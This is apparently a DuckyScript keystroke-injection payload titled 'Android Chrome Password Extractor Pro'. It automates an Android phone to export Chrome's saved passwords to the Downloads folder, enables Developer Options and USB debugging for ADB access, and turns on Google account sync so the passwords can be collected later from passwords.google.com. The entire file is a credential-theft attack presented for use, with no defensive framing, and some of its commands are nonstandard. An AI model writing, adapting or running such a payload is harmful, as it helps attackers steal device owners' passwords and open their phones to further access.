REM Android Chrome Password Extractor Pro
REM Author: AryanVBW
REM Version: 2.0
REM Improved for Android 10-13 compatibility
REM Works with most Android devices and security settings

REM ---- INITIAL SETUP ----
DELAY 2000

REM Wake up the device
ENTER
DELAY 500
ENTER
DELAY 1000

REM Swipe up to unlock (universal method)
SWIPE 500 1700 500 700
DELAY 1500

REM ---- METHOD 1: DIRECT CHROME ACCESS ----

REM Open Chrome browser (using app drawer)
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1200

REM Search for Chrome
STRING chrome
DELAY 800
ENTER
DELAY 3000

REM Access Chrome menu (three dots)
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 1000

REM Navigate to Settings
STRING s
DELAY 700
ENTER
DELAY 2000

REM Navigate to Passwords
STRING passwords
DELAY 700
ENTER
DELAY 2000

REM Tap on the three-dot menu in Password settings
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 1000

REM Select Export passwords option
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
ENTER
DELAY 1000

REM Confirm export (biometric/password may be required)
ENTER
DELAY 5000

REM Select file location (usually Downloads folder)
ENTER
DELAY 3000

REM ---- METHOD 2: ADB BACKUP (PREPARE DEVICE) ----

REM Go to Settings to enable Developer Options
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING settings
DELAY 800
ENTER
DELAY 2000

REM Navigate to About Phone (varies by device, so using search)
STRING about
DELAY 800
ENTER
DELAY 1500

REM Locate Build Number (usually at bottom)
SWIPE 500 1500 500 1000
DELAY 1000
SWIPE 500 1500 500 1000
DELAY 1000

REM Tap on Build Number 7 times to enable Developer Options
REPEAT 7 {
    DELAY 400
    ENTER
}
DELAY 2000

REM Go back to main Settings
BACK
DELAY 800
BACK
DELAY 800

REM Open Developer Options
STRING developer
DELAY 800
ENTER
DELAY 1500

REM Enable USB debugging
STRING usb debug
DELAY 800
ENTER
DELAY 1000
TAB
DELAY 500
ENTER
DELAY 1500

REM ---- METHOD 3: ACCESS THROUGH GOOGLE ACCOUNT ----

REM Go to Chrome again
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING chrome
DELAY 800
ENTER
DELAY 3000

REM Access Chrome menu
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 1000

REM Navigate to Settings
STRING s
DELAY 700
ENTER
DELAY 2000

REM Go to Google account settings
STRING account
DELAY 800
ENTER
DELAY 1500

REM Turn on sync if not enabled
TAB
DELAY 500
ENTER
DELAY 2000

REM This syncs passwords to Google account for later retrieval from passwords.google.com
DELAY 3000

REM ---- VERIFICATION AND CLEANUP ----

REM Check if export worked by opening Files app
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING files
DELAY 800
ENTER
DELAY 2000

REM Navigate to Downloads folder
STRING download
DELAY 800
ENTER
DELAY 1500

REM The password file should be visible here
DELAY 3000

REM Return to home screen to complete the script
HOME
DELAY 1000
